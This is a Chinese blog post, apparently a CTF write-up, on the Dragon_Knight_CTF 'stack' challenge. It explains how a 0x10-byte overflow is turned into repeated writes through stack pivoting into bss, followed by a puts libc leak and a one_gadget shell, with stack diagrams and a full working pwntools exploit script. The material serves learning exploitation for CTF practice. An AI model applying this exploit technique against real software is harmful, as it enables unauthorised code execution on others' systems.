Dragon_Knight_CTF-stack(栈迁移)

Dragon_Knight_CTF-stack(栈迁移)

程序的保护情况如下,可以看到没有开启pie保护

Arch:     amd64-64-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x3fe000)

可以看道main函数也很简洁,只有一个0x10大小的溢出,程序给了libc,版本是2.31的

nt __fastcall main(int argc, const char **argv, const char **envp)
{
  char buf[256]; // [rsp+0h] [rbp-100h] BYREF

  inits();
  puts("Hello, CTFer, do you know how to stack pivoting?");
  read(0, buf, 0x110uLL);
  return 0;
}

思路分析

思路一:

image-20240605212341156

可以看到返回地址是一个libc地址,我们只要将这个地址改成og地址就能拿到shell了,只不过这个比较看脸,1/4096的概率,理论上是可以拿到shell的,开多线程的话机会更大。但是对于我这种石头剪刀布都没有赢过别人的人,这种方法是行不通的。

image-20240605212759326

思路二:

那就是栈迁移了,pwn最开始的栈迁移题目,一般是会给两次read机会的,第一次让我们往bss段上写rop,第二次只给0x10大小的溢出空间让我们进行栈迁移操作。

这道题只给了0x10大小的栈溢出空间,所以我们要想办法,创造多次写入的机会。

main函数的汇编:

.text:0000000000401176 ; __unwind {
.text:0000000000401176                 endbr64
.text:000000000040117A                 push    rbp
.text:000000000040117B                 mov     rbp, rsp
.text:000000000040117E                 sub     rsp, 100h
.text:0000000000401185                 mov     eax, 0
.text:000000000040118A                 call    inits
.text:000000000040118F                 lea     rdi, s          ; "Hello, CTFer, do you know how to stack "...
.text:0000000000401196                 call    _puts
.text:000000000040119B                 lea     rax, [rbp+buf]
.text:00000000004011A2                 mov     edx, 110h       ; nbytes
.text:00000000004011A7                 mov     rsi, rax        ; buf
.text:00000000004011AA                 mov     edi, 0          ; fd
.text:00000000004011AF                 mov     eax, 0
.text:00000000004011B4                 call    _read
.text:00000000004011B9                 mov     eax, 0
.text:00000000004011BE                 leave
.text:00000000004011BF                 retn
.text:00000000004011BF ; } // starts at 401176
.text:00000000004011BF main            endp

可以看到0x040119B,这行汇编会将rbp+buf的地址传给rax,而0x04011A7又会将rax传给rsi,之后会执行read函数,而rsi正是read函数的第二个参数,也就是要写入内容的地址。

所以我们如果能控制了rbp,那么这里就相当于有一个任意写。

到这里思路就很明朗了,这里的任意写我们在bss段写上rop,然后会执行leave ret,完成栈转移。

第一次溢出:

magic = 0x0040119B   #lea rax,[rbp+buf]
bss_buf = 0x0404a00

payload = b'a'*0x100+p64(bss_buf+0x100)+p64(magic)
p.sendafter('pivoting?\n',payload)

因为是页对齐,所以bss段其实是比较大的,bss段开始是0x404040,我这里设置bss_buf是0x40a00,这两者相差好几百字节。为什么要这么设置呢?因为假如在bss段执行rop,比如说执行read函数,在调用read函数的时候会向上申请栈,那么他可能会申请到不可读的空间,甚至会覆盖到got表,这样程序就直接carsh了,所以栈转移一般要设置在bss段后面一点,以防发生类似的错误。

这里首先就是将rbp设置成bss_buf+0x100,然后将会执行read(0,bss_buf,0x110),在执行read函数的时候其实还没进行栈转移,栈转移是在执行完read函数之后进行的。

第二次溢出:

payload = p64(pop_rdi)+p64(puts_got)+p64(puts)
payload+= p64(pop_rbp)+p64(bss_buf+0x100+0x30)+p64(magic)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf-8)+p64(leave_ret)
p.send(payload)

向bss_buf进行写rop,用puts函数来泄露libc基地址。

之后通过调整rbp的值,再次调用magic函数来获取任意写,这次要写入的地址其实是bss_buf+0x30。

第三次溢出:

payload = p64(pop_r12_r13_r14_r15)+p64(0)*4+p64(shell)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf+0x30-8)+p64(leave_ret)
p.send(payload)

再次完成栈转移,将rip劫持到bss_buf+0x30去执行我们写入的pop_r12_r13_r14_r15,用pop_r12_r13_r14_r15来使og可用,拿到shell。


栈转移分析

为了方便理解,我画了一些栈图来帮助理解。

magic = 0x0040119B   #lea rax,[rbp+buf]
bss_buf = 0x0404a00

payload = b'a'*0x100+p64(bss_buf+0x100)+p64(magic)
p.sendafter('pivoting?\n',payload)

在执行完read函数,溢出后此时的栈空间:

rsp-->
...
0x7ffcb8008b70 aaaaaaaa
... aaaaaaaa
0x7ffcb8008c58 aaaaaaaa
0x7ffcb8008c60 aaaaaaaa
0x7ffcb8008c68 aaaaaaaa
rbp--> 0x7ffcb8008c70 0x404b00
return_addr 0x7ffcb8008c78 magic

执行main函数本身的leave ret后:

0x4049f8 0
0x404a00 0
0x404a08 0
0x404a10 0
0x404a18 0
0x404a20 0
0x404a28 0
0x404a30 0
... 0
rbp--> 0x404b00 0
0x404b08

执行read(0,0x404a00,0x110)

payload = p64(pop_rdi)+p64(puts_got)+p64(puts)
payload+= p64(pop_rbp)+p64(bss_buf+0x100+0x30)+p64(magic)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf-8)+p64(leave_ret)
p.send(payload)
0x4049f8 0
0x404a00 pop_rdi
0x404a08 puts_got
0x404a10 puts
0x404a18 pop_rbp
0x404a20 0x40b30
0x404a28 magic
0x404a30 0
... 0
rbp--> 0x404b00 0x4049f8
0x404b08 leave_ret

第一次溢出将返回地址覆盖为magic,执行完read后会带一个leave ret指令,执行完leave ret指令的栈图

rbp--> 0x4049f8 0
0x404a00 pop_rdi
0x404a08 puts_got
0x404a10 puts
0x404a18 pop_rbp
0x404a20 0x40b30
0x404a28 magic
0x404a30 aaaaaaaa
... aaaaaaaa
0x404b00 0x4049f8
rsp--> 0x404b08 leave_ret

rsp指向leave ret,将会再次执行leave ret指令,执行完的栈图

0x4049f8 0
rsp--> 0x404a00 pop_rdi
0x404a08 puts_got
0x404a10 puts
0x404a18 pop_rbp
0x404a20 0x40b30
0x404a28 magic
0x404a30 aaaaaaaa
... aaaaaaaa
rbp--> 0x404b00 0x4049f8
0x404b08 leave_ret

puts(puts_got)

read(0,0x404a30,0x110)

payload = p64(pop_r12_r13_r14_r15)+p64(0)*4+p64(shell)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf+0x30-8)+p64(leave_ret)
p.send(payload)
0x4049f8
0x404a00
0x404a08
0x404a10
0x404a18
0x404a20
rsp--> 0x404a28
0x404a30 pop_r12_r13_r14_r15
0x404a38 0
0x404a40 0
0x404a48 0
0x404a50 0
0x404a58 shell
... 0
0x404b08 0
0x404b10 0
0x404b18 0
0x404b20 0
0x404b28 0
rbp--> 0x404b30 0x404a28
0x404b38 leave_ret

执行跳转到magic地址自带的leave ret

0x4049f8
0x404a00
0x404a08
0x404a10
0x404a18
0x404a20
rbp--> 0x404a28
0x404a30 pop_r12_r13_r14_r15
0x404a38 0
0x404a40 0
0x404a48 0
0x404a50 0
0x404a58 shell
... 0
0x404b08 0
0x404b10 0
0x404b18 0
0x404b20 0
0x404b28 0
0x404b30 0x404a28
rsp--> 0x404b38 leave_ret

rsp指向leave ret,将会再次执行leave ret指令,执行完的栈图

0x4049f8
0x404a00
0x404a08
0x404a10
0x404a18
0x404a20
0x404a28
rsp--> 0x404a30 pop_r12_r13_r14_r15
0x404a38 0
0x404a40 0
0x404a48 0
0x404a50 0
0x404a50 shell
... 0
0x404b08 0
0x404b10 0
0x404b18 0
0x404b20 0
0x404b28 0
0x404b30 0x404a28
0x404b38 leave_ret

接下来执行pop_r12_r13_r14_r15,然后就拿到shell了。


exp

from pwn import *

p = process('./pwn')
elf = ELF('./pwn')
libc = ELF('./libc.so.6')
context(os='linux',arch='amd64',log_level='debug')

magic = 0x0040119B   #lea rax,[rbp+buf]
pop_rdi = 0x00401210
puts_got = elf.got['puts']
puts = elf.plt['puts']
leave_ret = 0x004011BE
read = elf.plt['read']
pop_rbp = 0x0040115d
bss_buf = 0x0404a00
og = [0xe3afe,0xe3b01,0xe3b04]

payload = b'a'*0x100+p64(bss_buf+0x100)+p64(magic)
p.sendafter('pivoting?\n',payload)

payload = p64(pop_rdi)+p64(puts_got)+p64(puts)
payload+= p64(pop_rbp)+p64(bss_buf+0x100+0x30)+p64(magic)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf-8)+p64(leave_ret)
p.send(payload)
libc_base = u64(p.recvuntil(b'\n')[:-1].ljust(8,b'\x00'))-libc.symbols['puts']
print('libc_base-->'+hex(libc_base))

shell = libc_base+og[0]
pop_r12_r13_r14_r15 = 0x040127c

payload = p64(pop_r12_r13_r14_r15)+p64(0)*4+p64(shell)
payload = payload.ljust(0x100,b'\x00')
payload+= p64(bss_buf+0x30-8)+p64(leave_ret)
p.send(payload)
p.interactive()
posted @   山西小嫦娥  阅读(80)  评论(0编辑  收藏  举报
点击右上角即可分享
微信分享提示